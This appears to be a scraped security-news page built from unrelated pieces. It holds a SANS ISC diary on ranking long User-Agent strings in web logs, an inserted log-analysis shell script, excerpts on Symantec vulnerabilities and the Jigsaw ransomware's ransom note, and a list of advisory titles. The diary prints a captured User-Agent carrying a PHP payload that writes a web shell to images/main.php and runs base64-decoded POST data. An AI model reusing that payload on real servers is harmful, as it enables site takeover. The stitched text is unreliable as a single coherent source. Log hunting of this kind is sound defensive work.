(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest ones that I can find in my logs. First of all: how?

First, I am extracting the User-Agent string from my web server access log:

cut -f 6 -d '"' access_log > /tmp/useragents  (this may look different for you if you use a different log format; in the combined log format the User-Agent is the sixth double-quote-delimited field)

Next, sorting the result by line length:

cat /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2- | uniq
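The same two steps wrapped in shell functions, as an added example that is not part of the diary: it writes a small constructed combined-format access log (the hosts, paths and User-Agent strings are made up for this example), extracts field 6, ranks the unique User-Agents by length, and adds a simple length-threshold check. The one change from the diary's pipeline is that duplicates are removed with `sort -u` before ranking, because `uniq` only collapses adjacent lines and a stable numeric sort does not guarantee that identical strings end up next to each other.

```shell
#!/bin/sh
# Added example, not code from the ISC diary. Wraps the diary's pipeline
# (cut field 6 of a '"'-delimited combined-format log, rank by length) in
# functions and adds a length-threshold report. All log lines, hosts and
# User-Agent strings below are constructed for this example.

# Write a small constructed access log in combined format to the given path.
write_sample_log() {
    cat > "$1" <<'EOF'
192.0.2.10 - - [10/Jun/2016:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0"
192.0.2.11 - - [10/Jun/2016:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.47.0"
192.0.2.12 - - [10/Jun/2016:12:00:03 +0000] "GET /wp-login.php HTTP/1.1" 404 221 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko MSOffice 15"
192.0.2.10 - - [10/Jun/2016:12:00:04 +0000] "GET /about.html HTTP/1.1" 200 900 "http://www.example.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0"
EOF
}

# In the combined log format the User-Agent is the sixth '"'-delimited field
# (fields 2 and 4 are the request line and the referer).
extract_user_agents() {
    cut -f 6 -d '"' "$1"
}

# Unique User-Agents, shortest first: dedupe, prefix each line with its
# length, stable numeric sort, then strip the length prefix again.
rank_user_agents_by_length() {
    extract_user_agents "$1" | sort -u | awk '{ print length, $0 }' \
        | sort -n -s | cut -d ' ' -f 2-
}

# The single longest User-Agent seen in the log.
longest_user_agent() {
    rank_user_agents_by_length "$1" | tail -n 1
}

# Its length in bytes (all sample strings are ASCII, so bytes == characters).
longest_user_agent_length() {
    longest_user_agent "$1" | awk '{ print length($0) }'
}

# Defender's check: unique User-Agents longer than a byte threshold. Legitimate
# browser strings rarely exceed a few hundred bytes; anything far beyond that
# deserves a look, since injected script fragments tend to land here.
user_agents_longer_than() {
    extract_user_agents "$2" | awk -v max="$1" 'length($0) > max' | sort -u
}

SAMPLE_LOG="${TMPDIR:-/tmp}/ua_example_access_log.$$"
write_sample_log "$SAMPLE_LOG"

echo "Unique User-Agents by length (shortest first):"
rank_user_agents_by_length "$SAMPLE_LOG"
echo "Longest: $(longest_user_agent "$SAMPLE_LOG") ($(longest_user_agent_length "$SAMPLE_LOG") bytes)"
echo "Longer than 70 bytes:"
user_agents_longer_than 70 "$SAMPLE_LOG"
```

Point `write_sample_log` at your own `access_log` path instead (or skip it and call the functions on the real file) and raise the threshold in `user_agents_longer_than` to whatever is normal for your traffic; the sample file is left in place so the functions can be re-run against it.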

So finally, some of the winners:

rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...) s:254:\x22file_put_contents($_SERVER[\x22DOCUMENT_ROOT\x22].chr(47).\x22images\x22.chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST[@123if(\x5Cx24mujj!=){\x5Cx24xsser=base64_decode(\x5Cx24_POST[z0 MSOffice 15)

Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...

Oddly enough, no shellshock today.

What is your longest User-Agent if you search your weblogs?

Johannes B. Ullrich, Ph.D.




Much of the product line from security firm Symantec contains a raft of vulnerabilities that expose millions of consumers, small businesses, and large organizations to self-replicating attacks that take complete control of their computers, a researcher warned Tuesday.

"These vulnerabilities are as bad as it gets," Tavis Ormandy, a researcher with Google's Project Zero, wrote in a blog post. "They don’t require any user interaction, they affect the default configuration, and the software runs at the highest privilege levels possible. In certain cases on Windows, vulnerable code is even loaded into the kernel, resulting in remote kernel memory corruption."

The post was published shortly after Symantec issued its own advisory, which listed 17 Symantec enterprise products and eight Norton consumer and small business products being affected. Ormandy warned that the vulnerability is unusually easy to exploit, allowing the exploits to spread virally from machine to machine over a targeted network, or potentially over the Internet at large. Ormandy continued:




The crypto ransomware racket is a booming business that generates lots of revenue, so it only makes sense that the scourge is growing. And with new titles entering the market on almost a weekly basis, how do the criminals behind them make their malware stand out?

In the case of Jigsaw, a ransomware package that was first spotted in April by researchers with the Bleeping Computer security site, the answer is to be as brazen and mean-spirited as possible while at the same time making the payment process as easy as possible. A case in point: Jigsaw not only threatens the permanent loss of personal data, it also holds out the fear that victims' dirty laundry will be published for all to see. And it uses a taunting tone when notifying people of their options. Witness the screenshot above from a recent version. It states:

Very bad news! I am a so-called ransomware/locker with following advanced functions: Encrypting all your data.
Collecting all logins, contacts, eMail, Passwords and Skype History .....Done!
Uploading all of it on a server .....................Done!
Sending a copy of those Datas to ALL of your contacts..............Pending

The doxing threat, which was added last week, is pure evil genius because it gives victims a strong incentive to pay the ransom even when the purloined data is available on a backup drive.


KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
[KIS-2016-10] Concrete5 <= (Application::dispatch) Local File Inclusion Vulnerability
[KIS-2016-09] Concrete5 <= Multiple Stored Cross-Site Scripting Vulnerabilities
[KIS-2016-08] Concrete5 <= Multiple Cross-Site Request Forgeries Vulnerabilities
Ladesk Agent #1 (Bug Bounty) - Session Reset Password Vulnerability
Iranian Weblog Services v3.3 CMS - Multiple Web Vulnerabilities
Alfine CMS v2.6 - (Login) Auth Bypass Vulnerability
Mutualaid CMS v4.3.1 - SQL Injection Web Vulnerability
[SECURITY] [DSA 3607-1] linux security update
Craft CMS affected by server side template injection